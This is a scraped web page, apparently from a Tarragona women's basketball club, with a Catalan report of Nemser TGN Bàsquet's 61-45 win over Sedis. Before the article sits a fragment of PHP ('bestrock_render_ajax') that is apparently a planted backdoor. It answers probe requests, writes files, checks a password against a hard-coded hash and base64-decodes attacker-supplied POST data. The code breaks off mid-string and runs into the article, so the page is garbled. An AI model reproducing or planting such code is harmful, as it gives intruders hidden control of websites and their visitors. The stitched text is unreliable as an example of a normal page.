function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser exhibeix per primera vegada el potencial del perímetre i tomba el Sedis (61-45) - Tgn Bàsquet Club -

El Nemser exhibeix per primera vegada el potencial del perímetre i tomba el Sedis (61-45)

Updated: novembre 10, 2013

No havia passat fins ara. No aquest curs. El Nemser TGN Bàsquet havia estat negat des de la línia de tres punts i això, en un equip amb poca alçada era tot un handicap en el joc estàtic. Ahir, però,  va ser diferent. El conjunt lila va anotar 9 triples i va aplanar el camí cap el quart triomf de la temporada i no contra un equip qualsevol. El Sedis, cinquè classificat en arribar ahir al pavelló del Sagrat Cor, es presentava amb les credencials d’equip potent després d’haver guanyat el Sabadell en la jornada anterior. El Nemser TGN Bàsquet, però, li va desmuntar els plans en els cinc primers minuts. Un parcial de sortida de 13-3 atorgaven les regnes del partit al conjunt local que mai va cedir la iniciativa i que va sempre va donar la sensació de ser superior al seu rival tot i que no va fer el millor partit de la temporada.

El conjunt de Juan Carlos Arjona es va voler arrecerar, com sempre, en la seva defensa pressionant però ahir no va tenir el millor dia. Tot i que les noies ho provaven la cosa no rutllava del tot defensivament parlant. Sort en va tenir el Nemser TGN Bàsquet que el Sedis no va tenir les idees clares en atac. Amb aquest panorama de poca clarividència mutu el matx va entrar en una dinàmica de joc poc atractiu que va ser trencar per l’equip local a còpia de triples. Ona Fort, en un moment de forma extraordinari, va afinar el seu canell i Villegas i Cabré la van seguir. Fins a 9 tirs de tres punts va encistellar l’equip lila, rècord aquest curs. Amb el partit de clar bàndol local en apropar-se el descans el Nemser va badar i el Sedis, aquest cop sí, ho va aprofitar per fer un parcial de 2-14 que deixava el marcador en un inquietant 31-28 a la mitja part.

La segona meitat, però, va ser gairebé un calc del que s’havia vist en els primers vint minuts. El Nemser TGN Bàsquet va sortir amb intensitat a la pista i tot i que el Sedis també va trobar en la línia de tres punts el seu aliat, les locals van tancar el període amb un avantatge de 12 punts 50-38. Els últims deu minuts haurien pogut servir per aconseguir un avantatge més còmode per les noies d’Arjona però la falta d’encert i algunes errades ho van impedir. Amb tot, la defensa va fer la feina bruta deixant sense anotar les visitants en els últims cinc minuts en el partit que va suposar la reaparició de Laura Martínez després d’un mes de baixa.